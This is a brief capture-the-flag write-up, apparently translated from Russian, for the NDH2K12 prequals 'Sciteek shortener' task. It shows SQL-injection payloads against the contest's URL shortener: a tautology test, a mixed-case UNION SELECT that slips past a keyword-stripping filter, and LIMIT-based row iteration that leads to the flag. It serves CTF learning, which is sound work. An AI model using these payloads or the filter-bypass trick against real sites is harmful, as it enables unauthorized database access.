Лаборатория NDH2K12 Prequals - Sciteek shortener

, 26 марта 2012

The whole task is reduced to two points:

  1. Find SQL-injection
  2. Unleash, bypassing WAF

First point found arekusux, telling the conference:

sci.nuitduhack.com/sa' or '1' ='1


The most common syntax in this case, and script redirects to google (respectively is - the first entry in the database).

Next, if you use a valid syntax with union or UNION script always gave an error, no matter how many of columns used.

As it turns out, is just a slice of key words in any of the registers (simple WAF). As a result, the injection could be performed as follows:

http://sci.nuitduhack.com/sa' UnION SELeCT USER () -- - (the table have just one column)

Iterate ...

http://sci.nuitduhack.com/sa' or 1=1 LIMIT 1,1 -- -

http://sci.nuitduhack.com/sa' or 1=1 LIMIT 2,1 -- -


http://sci.nuitduhack.com/sa' or 1 =1 LIMIT 7,1 -- -

And the seventh link leads to a key http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt